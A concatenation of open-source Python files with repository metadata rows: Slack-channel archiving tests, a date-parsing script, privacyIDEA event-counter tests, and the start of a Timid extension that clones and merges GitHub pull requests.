self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum(m.get('subtype', None) in (None, 'bot_message') for m in sample_slack_messages)
)
class DestalinatorGetStaleChannelsTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_default_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 0)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_specific_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 2)
class DestalinatorIgnoreChannelTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
def test_with_explicit_ignore_channel(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_matching_ignore_channel_pattern(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^stal']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
@mock.patch('tests.test_destalinator.SlackerMock')
    def test_with_non_matching_ignore_channel_pattern(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len']
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
def test_with_many_matching_ignore_channel_patterns(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len', 'lin', '^st']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_empty_ignore_channel_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = []
self.destalinator.config.config['ignore_channel_patterns'] = []
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
class DestalinatorStaleTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_sample_messages(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertFalse(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_users_ignored(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_a_dolphin_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": ":dolphin:",
"ts": "1355517523.000005"
}
]
self.destalinator.get_messages = mock.MagicMock(return_value=messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_an_attachment_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=[m for m in sample_slack_messages if 'attachments' in m])
self.assertFalse(self.destalinator.stale('stalinists', 30))
class DestalinatorArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_ignored_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_when_destalinator_not_activated(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=False)
mock_slacker.post_message.return_value = {}
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_closure_with_closure_text(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.get_channel_member_names.return_value = ['sridhar', 'jane']
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', mock.ANY, message_type='channel_archive'),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_members_at_channel_closing(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
names = ['sridhar', 'jane']
mock_slacker.get_channel_member_names.return_value = names
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', MockValidator(lambda s: all(name in s for name in names)), message_type=mock.ANY),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.archive("stalinists")
mock_slacker.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_channel_with_only_restricted_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.channel_has_only_restricted_members.return_value = True
self.destalinator.safe_archive("stalinists")
self.assertFalse(mock_slacker.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_archiving_if_before_earliest_archive_date(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
        # Use timedelta so this also works on the last day of a month
        self.destalinator.earliest_archive_date = date.today() + timedelta(days=1)
self.destalinator.safe_archive("stalinists")
self.assertFalse(self.destalinator.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.safe_archive("stalinists")
self.destalinator.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveAllTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_stale_once_for_each_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
self.destalinator.stale = mock.MagicMock(return_value=False)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive_all(days)
self.assertEqual(self.destalinator.stale.mock_calls, [mock.call('leninists', days), mock.call('stalinists', days)])
@mock.patch('tests.test_destalinator.SlackerMock')
def test_only_archives_stale_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive = mock.MagicMock()
self.destalinator.safe_archive_all(days)
self.destalinator.safe_archive.assert_called_once_with('leninists')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_archive_ignored_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['leninists']
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.earliest_archive_date = date.today()
self.destalinator.safe_archive_all(self.destalinator.config.archive_threshold)
self.assertFalse(mock_slacker.archive.called)
class DestalinatorWarnTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_warns_by_posting_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.destalinator.warn("stalinists", 30)
mock_slacker.post_message.assert_called_with("stalinists", self.destalinator.warning_text, message_type='channel_warning')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text,
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_with_changed_text_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text + "Some new stuff",
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,137,686,970,157,095,000 | 48.113462 | 130 | 0.673519 | false |
UpOut/UpOutDF | test.py | 1 | 2268 | from upoutdf.parse import get_class
#test = "every month on last sunday,monday starting _October_15_2012_8:00PM ending _April_1_2014 at 8:00PM lasting 120 minutes in America/Los_Angeles"
#test = "every month day 4 starting _October_1_2013 ending _April_1_2014 at 8:00PM lasting 2 hours in America/Los_Angeles"
#test = "every weeks on tuesday,monday at 9:00PM lasting 6 hours in America/Los_Angeles"
test = "once starting _05/23/2015_08:00_PM ending _05/23/2015_11:00_PM in US/Pacific"
z = get_class(test)
def localize(time,timezone):
return timezone.normalize(time.astimezone(timezone))
z.verify()
z.parse()
print z.canonicalize()
#print z.occurences().__hash__()
#print "FROM HERE"
#for block in z.occurences().get_blocks():
# print block.__hash__()
# for o in block.get_occurences():
# pass
#print o.__hash__()
# print "\n\n"
#start = localize(start,z.timezone)
#end = localize(end,z.timezone)
#print start
#print start.isoweekday()
#print end
#print end.isoweekday()
#print "\n\n---"
"""
from upoutdf.snapping import SnapLogical
from dateutil import parser
import pytz
tz = pytz.timezone('America/Los_Angeles')
date = parser.parse("February 5, 2014")
date = tz.localize(date)
date = pytz.utc.normalize(date.astimezone(pytz.utc))
snapper = SnapLogical(tz)
print snapper.snap_to_month_weekday(date,5,'last')
"""
"""
FORMATS:
RECURRING:
every (int) <year(s) (day <int>)| month(s) on <<1st,2nd,3rd,4th,5th,last> <m,t,w,tr,f,sa,s> | day <int>> | week(s) on <m,t,w,tr,f,sa,s> | day(s)> (starting <datetimestring>) (ending <datetimestring>) (repeating <int> times) at <timestamp> lasting <int> <hours,minutes,seconds> in <timezone>
SINGLE:
once starting <datetimestring> ending <datetimestring> in America/Los_Angeles
Both starting and ending are inclusive
every [int] [years/months/weeks/days] [day][on] [dow] [int] starting [date] ending [date] at [time] lasting[hours]
every month on 3rd thursday at 9:00PM lasting 6 hours in America/Los_Angeles
3rd thursday of every month
At 9:00pm until 3AM
every 1 year at TIMESTAMP lasting 4 hours in America/Los_Angeles
every week starting TIMESTAMP ending TIMESTAMP at TIMESTAMP until TIMESTAMP in America/New_York_City
""" | mit | 8,324,564,143,246,006,000 | 29.253333 | 298 | 0.701499 | false |
privacyidea/privacyidea | tests/test_lib_counter.py | 1 | 5817 | """
This tests the files
lib/counter.py
"""
import mock
from contextlib import contextmanager
from .base import MyTestCase
from privacyidea.lib.counter import increase, decrease, reset, read
from privacyidea.models import EventCounter
def increase_and_read(name):
""" helper function that increases the event counter and returns the new value """
increase(name)
return read(name)
def decrease_and_read(name, allow_negative=False):
""" helper function that decreases the event counter and returns the new value """
decrease(name, allow_negative=allow_negative)
return read(name)
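# Illustrative sketch (not part of the original tests): the helpers above let a
# test bump a counter and assert on the new value in one call, e.g. (counter
# name made up):
#
#   self.assertEqual(increase_and_read("login_failures"), 1)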
class CounterTestCase(MyTestCase):
"""
Test the counter module
"""
def setUp(self):
pass
def tearDown(self):
pass
def test_00_create_and_increase(self):
r = increase_and_read("hallo_counter")
self.assertEqual(r, 1)
r = increase_and_read("counter2")
self.assertEqual(r, 1)
r = increase_and_read("hallo_counter")
self.assertEqual(r, 2)
counter = EventCounter.query.filter_by(counter_name="hallo_counter").first()
self.assertEqual(counter.counter_value, 2)
def test_01_increase_and_decrease(self):
r = increase_and_read("hallo_counter1")
self.assertEqual(r, 1)
for x in range(1, 5):
increase("hallo_counter1")
counter = EventCounter.query.filter_by(counter_name="hallo_counter1").first()
self.assertEqual(counter.counter_value, 5)
r = decrease_and_read("hallo_counter1")
self.assertEqual(r, 4)
for x in range(1, 8):
decrease("hallo_counter1")
counter = EventCounter.query.filter_by(counter_name="hallo_counter1").first()
self.assertEqual(counter.counter_value, 0)
# Test reading counter
r = read("hallo_counter1")
self.assertEqual(r, 0)
r = read("unknown counter")
self.assertEqual(r, None)
def test_02_decrease_beyond_zero(self):
r = increase_and_read("hallo_counter2")
self.assertEqual(r, 1)
for x in range(1, 8):
decrease("hallo_counter2", allow_negative=True)
counter = EventCounter.query.filter_by(counter_name="hallo_counter2").first()
self.assertEqual(counter.counter_value, -6)
def test_03_decrease_and_reset(self):
r = decrease_and_read("hallo_counter3", allow_negative=True)
self.assertEqual(r, -1)
reset("hallo_counter3")
counter = EventCounter.query.filter_by(counter_name="hallo_counter3").first()
self.assertEqual(counter.counter_value, 0)
def test_04_reset_non_existing_counter(self):
reset("hallo_counter4")
counter = EventCounter.query.filter_by(counter_name="hallo_counter4").first()
self.assertEqual(counter.counter_value, 0)
def test_05_multiple_nodes(self):
@contextmanager
def _set_node(node):
""" context manager that sets the current node name """
with mock.patch("privacyidea.lib.counter.get_privacyidea_node") as mock_node:
mock_node.return_value = node
yield
# two nodes node1 and node2, two counters ctrA and ctrB
with _set_node("node1"):
for _ in range(3):
increase("ctrA")
increase("ctrB")
with _set_node("node2"):
r = increase_and_read("ctrB")
self.assertEqual(r, 2)
# sums are correct ...
self.assertEqual(read("ctrA"), 3)
self.assertEqual(read("ctrB"), 2)
# ... and each node has written to its own row
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrA", node="node1").one().counter_value, 3)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrA", node="node2").all(), [])
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 1)
# decreasing ctrB on node2 by 2 creates a row with negative value, even if allow_negative=False
with _set_node("node2"):
for _ in range(2):
decrease("ctrB", allow_negative=False)
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, -1)
# decreasing below the sum of 0 causes all values to be reset
with _set_node("node2"):
decrease("ctrB", allow_negative=False)
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 0)
# decreasing with allow_negative=True works
with _set_node("node1"):
decrease("ctrB", allow_negative=True)
with _set_node("node2"):
decrease("ctrB", allow_negative=True)
self.assertEqual(read("ctrB"), -2)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, -1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, -1)
# resetting resets all rows
reset("ctrB")
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 0) | agpl-3.0 | -1,479,203,389,174,188,800 | 36.535484 | 113 | 0.63727 | false |
rackerlabs/timid-github | timid_github.py | 1 | 33572 | # Copyright 2016 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS
# IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import errno
import getpass
import inspect
import json
import os
import shutil
import stat
import subprocess
import sys
import time
import github
import keyring
import six
import timid
SSH_ERROR = b'ssh_exchange_identification: Connection closed by remote host'
class GitException(Exception):
"""
An exception to be thrown in the event of an error observed while
executing the "git" command.
"""
def __init__(self, message, result=None):
"""
Initialize a ``GitException`` object.
:param message: The exception message.
:param result: An optional ``timid.StepResult`` object.
"""
# Initialize the superclass
super(GitException, self).__init__(message)
self.result = result
def exc_to_result(func):
"""
A decorator to convert an exception into an appropriate
``timid.StepResult``. This wrapper special-cases the
``GitException`` to return the contents of the ``result``
attribute.
:param func: The function to wrap.
:returns: The wrapped function.
"""
@six.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except GitException as e:
return e.result
except Exception:
return timid.StepResult(exc_info=sys.exc_info())
return wrapper
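# Illustrative usage sketch (not part of the original module; the action method
# below is made up): wrapping an action callable so unexpected exceptions come
# back as StepResult objects instead of propagating.
#
#   @exc_to_result
#   def __call__(self, ctxt):
#       _git(ctxt, 'status')
#       return timid.StepResult(state=timid.SUCCESS)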
def _git(ctxt, *args, **kwargs):
"""
Invoke a "git" subcommand.
:param ctxt: The context object.
:param args: Positional arguments, specified as strings; the first
must be a "git" subcommand, and remaining arguments
will be passed to that subcommand.
:param ssh_retries: A keyword-only parameter specifying the number
of retries to attempt. If the command fails
due to an SSH error, the command will be
retried up to this many times. This does not
impact failures due to other connection
errors. Defaults to ``1``.
:param do_raise: A keyword-only parameter specifying whether to
raise exceptions in the event of command
failures. If ``False``, no exception will be
raised. Defaults to ``True``.
:returns: The contents of standard output.
"""
# Extract keyword-only parameters
ssh_retries = kwargs.get('ssh_retries', 1)
do_raise = kwargs.get('do_raise', True)
# Construct the full command
cmd = ['git']
cmd.extend(args)
# Construct the command text for debugging and error output
cmd_text = ' '.join(six.moves.shlex_quote(c) for c in cmd)
# Loop the requisite number of times, with appropriate sleeps
sleep_time = 1
num_tries = 0
while num_tries < ssh_retries:
num_tries += 1
if num_tries > 1:
# Second or subsequent try; sleep with exponential backoff
time.sleep(sleep_time)
sleep_time <<= 1
ctxt.emit('Retry %d of %d: retrying command "%s"' %
(num_tries, ssh_retries, cmd_text), debug=True)
else:
ctxt.emit('Executing command "%s"' % cmd_text, debug=True)
# Run the command
child = ctxt.environment.call(
cmd, close_fds=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = child.communicate()
ctxt.emit('Command result: return code %d, stdout %r, stderr %r' %
(child.returncode, stdout, stderr), debug=True)
# Do we need to retry?
if child.returncode and (SSH_ERROR in stdout or SSH_ERROR in stderr):
ctxt.emit('Retrying command after a sleep of %d seconds' %
sleep_time, debug=True)
continue
# We have executed it!
break
else:
ctxt.emit('Too many tries, exiting instead', debug=True)
if do_raise and child.returncode:
# Include stdout
text = stdout.strip()
if text:
msg = ('Git command "%s" returned %d: %s' %
(cmd_text, child.returncode, text))
else:
msg = ('Git command "%s" returned %d' %
(cmd_text, child.returncode))
# Raise the exception
result = timid.StepResult(state=timid.ERROR, msg=msg,
returncode=child.returncode)
raise GitException(msg, result)
# Return the standard output
return stdout
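# Illustrative usage sketch (not part of the original module; the arguments are
# examples only): cloning with SSH retries, and probing a ref without raising.
#
#   _git(ctxt, 'clone', repo_url, target_dir, ssh_retries=5)
#   _git(ctxt, 'rev-parse', '--verify', 'refs/heads/feature', do_raise=False)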
class CloneAction(timid.Action):
"""
A Timid action that will clone the target repository. The
repository will be cloned into the working directory. This action
cannot appear in the test description, as it is implicitly added
by the ``GithubExtension`` extension.
"""
schema = None
def __init__(self, ctxt, ghe):
"""
Initialize a ``CloneAction`` instance.
:param ghe: An instance of ``GithubExtension``.
"""
# Initialize the superclass
super(CloneAction, self).__init__(ctxt, '__clone__', None, None)
# Store the github extension instance
self.ghe = ghe
def validate_conf(self, name, config, step_addr):
"""
Validate configuration. This action does not take a
configuration, so the ``validate_conf()`` method is overridden
to inhibit validation.
:param name: The name of the action or modifier.
:param config: The actual configuration.
:param step_addr: The address of the step in the test
configuration.
"""
pass # pragma: no cover
@exc_to_result
def __call__(self, ctxt):
"""
Invoke the action. This method will clone the repository into the
correct directory, then switch to that directory.
:param ctxt: The context object.
:returns: A ``StepResult`` object.
"""
# First step, see if the repository exists
work_dir = ctxt.environment.cwd
repo_dir = os.path.join(work_dir, self.ghe.repo_name)
try:
dir_data = os.lstat(repo_dir)
except OSError as e:
            # Return an error result if it's not ENOENT
if e.errno != errno.ENOENT:
msg = 'Unable to stat repo directory %s' % repo_dir
return timid.StepResult(msg=msg, exc_info=sys.exc_info())
# OK, safe to clone from scratch
return self._clone(work_dir, repo_dir, ctxt)
# Hmmm, the file exists; is it a directory?
if not stat.S_ISDIR(dir_data.st_mode):
# OK, we control the workdir, so delete the extraneous
# file and clone from scratch
ctxt.emit('Deleting file shadowing repository directory %s' %
repo_dir, level=2)
os.remove(repo_dir)
return self._clone(work_dir, repo_dir, ctxt)
# It's a directory; is it a repository?
if os.path.isdir(os.path.join(repo_dir, '.git')):
# Try updating the base branch
try:
ctxt.environment.cwd = repo_dir
return self._update(ctxt)
except Exception:
# Failed to update, so back out of the directory
# temporarily
ctxt.emit('Failed to update existing repository in '
'directory %s; starting from scratch' % repo_dir)
ctxt.environment.cwd = work_dir
# Not a repository, or couldn't update; blow it away and try
# cloning from scratch
ctxt.emit('Deleting directory tree shadowing repository directory %s' %
repo_dir, level=2)
shutil.rmtree(repo_dir)
return self._clone(work_dir, repo_dir, ctxt)
def _clone(self, work_dir, target_dir, ctxt):
"""
Clones the base repository into the specified target directory.
:param work_dir: The current working directory. This is used
to restore the environment working directory
in the event that the later call to
``self._update()`` fails.
:param target_dir: The directory into which the repository
should be checked out.
:param ctxt: The context object.
"""
# Begin by cloning the repository
ctxt.emit('Cloning repository from %s into directory %s' %
(self.ghe.repo_url, target_dir))
_git(ctxt, 'clone', self.ghe.repo_url, target_dir, ssh_retries=5)
# Change to the target directory and fetch any changes
try:
ctxt.environment.cwd = target_dir
return self._update(ctxt)
except Exception:
exc_info = sys.exc_info()
# Reset the directory
ctxt.environment.cwd = work_dir
# Re-raise the exception
six.reraise(*exc_info)
def _update(self, ctxt):
"""
Updates the repository, assumed to be the current working
directory, from the specified base repository.
:param ctxt: The context object.
:returns: A ``timid.StepResult`` object.
"""
ctxt.emit('Updating repository from upstream data')
# Ensure the remote is set properly
_git(ctxt, 'remote', 'set-url', 'origin', self.ghe.repo_url)
# Do some initial resets
ctxt.emit('Cleaning up repository...', level=2)
_git(ctxt, 'rebase', '--abort', do_raise=False)
_git(ctxt, 'checkout', '-f', self.ghe.repo_branch)
_git(ctxt, 'reset', '--hard', 'origin/%s' % self.ghe.repo_branch)
_git(ctxt, 'clean', '-fdx')
# And check out the designated branch
ctxt.emit('Checking out most recent version of branch %s' %
self.ghe.repo_branch, level=2)
_git(ctxt, 'fetch', 'origin', self.ghe.repo_branch, ssh_retries=5)
_git(ctxt, 'checkout', self.ghe.repo_branch)
return timid.StepResult(state=timid.SUCCESS)
class MergeAction(timid.Action):
"""
A Timid action that will prepare a repository by creating and
checking out a topic branch and merging the pull request into that
branch. This action cannot appear in the test description, as it
is implicitly added by the ``GithubExtension`` extension.
"""
schema = None
def __init__(self, ctxt, ghe):
"""
Initialize a ``MergeAction`` instance.
:param ghe: An instance of ``GithubExtension``.
"""
# Initialize the superclass
super(MergeAction, self).__init__(ctxt, '__merge__', None, None)
# Store the github extension instance
self.ghe = ghe
def validate_conf(self, name, config, step_addr):
"""
Validate configuration. This action does not take a
configuration, so the ``validate_conf()`` method is overridden
to inhibit validation.
:param name: The name of the action or modifier.
:param config: The actual configuration.
:param step_addr: The address of the step in the test
configuration.
"""
pass # pragma: no cover
@exc_to_result
def __call__(self, ctxt):
"""
Invoke the action. This method will create the appropriate branch
and merge the pull request into it.
:param ctxt: The context object.
:returns: A ``StepResult`` object.
"""
# Compute a branch name
local_branch = ('%s-%s' %
(self.ghe.pull.user.login, self.ghe.change_branch))
ctxt.emit('Cloning pull request from %s branch %s '
'into local branch %s' %
(self.ghe.pull.user.login, self.ghe.change_branch,
local_branch))
# Make sure the branch doesn't already exist
_git(ctxt, 'branch', '-D', local_branch, do_raise=False)
# Create the branch
_git(ctxt, 'checkout', '-b', local_branch, self.ghe.repo_branch)
_git(ctxt, 'pull', self.ghe.change_url, self.ghe.change_branch)
# Merge the change
ctxt.emit('Merging the change into branch %s' % self.ghe.repo_branch)
_git(ctxt, 'checkout', self.ghe.repo_branch)
_git(ctxt, 'merge', local_branch)
return timid.StepResult(state=timid.SUCCESS)
# A mapping of URL string to the attribute of the repository object
# containing the desired URL.
URL_ATTR = {
'ssh': 'ssh_url',
'git': 'git_url',
'https': 'clone_url',
}
def _select_url(repo_url, repo_obj):
"""
Select the appropriate repository URL.
:param repo_url: The URL to select. May be "ssh", "git", or
"https" to select the appropriate URL from the
``repo_obj``, or may be a verbatim repository
URL.
:param repo_obj: An instance of ``github.Repository.Repository``.
:returns: The appropriate repository URL.
"""
# If it's one of the defined ones, return the appropriate
# attribute
if repo_url in URL_ATTR:
return getattr(repo_obj, URL_ATTR[repo_url])
# Verbatim URL; return it unchanged
return repo_url
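# Illustrative sketch (not part of the original module): the three tokens map
# to attributes of the PyGithub repository object, anything else passes
# through unchanged.
#
#   _select_url('ssh', repo_obj)                            # -> repo_obj.ssh_url
#   _select_url('https', repo_obj)                          # -> repo_obj.clone_url
#   _select_url('git@example.com:org/repo.git', repo_obj)   # -> unchanged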
class GithubExtension(timid.Extension):
"""
A Timid extension that provides integration with Github. This
will allow a pull request to be tested directly by Timid. Testing
includes making status updates to the pull request for each step
in the testing procedure, with a final "success" or "failure"
status at the conclusion of testing, with an optional override for
"success" status.
"""
priority = 50
@classmethod
def prepare(cls, parser):
"""
Called to prepare the extension. The extension is prepared during
argument parser preparation. An extension implementing this
method is able to add command line arguments specific for that
extension. Note that this is a class method; the extension
will not be instantiated prior to calling this method, nor
should this method attempt to initialize the extension.
:param parser: The argument parser, an instance of
``argparse.ArgumentParser``.
"""
# Begin by grouping the extension arguments
group = parser.add_argument_group(
'Github Integration', 'Options for integrating with Github.',
)
# Authentication options
group.add_argument(
'--github-api',
default=os.environ.get('TIMID_GITHUB_API',
'https://api.github.com'),
help='Designate the Github API for the instance of Github to '
'search for the pull request. Default is drawn from the '
'"TIMID_GITHUB_API" environment variable. Default: %(default)s',
)
group.add_argument(
'--github-user',
default=os.environ.get('TIMID_GITHUB_USER', getpass.getuser()),
help='Designate the username to use to authenticate to the '
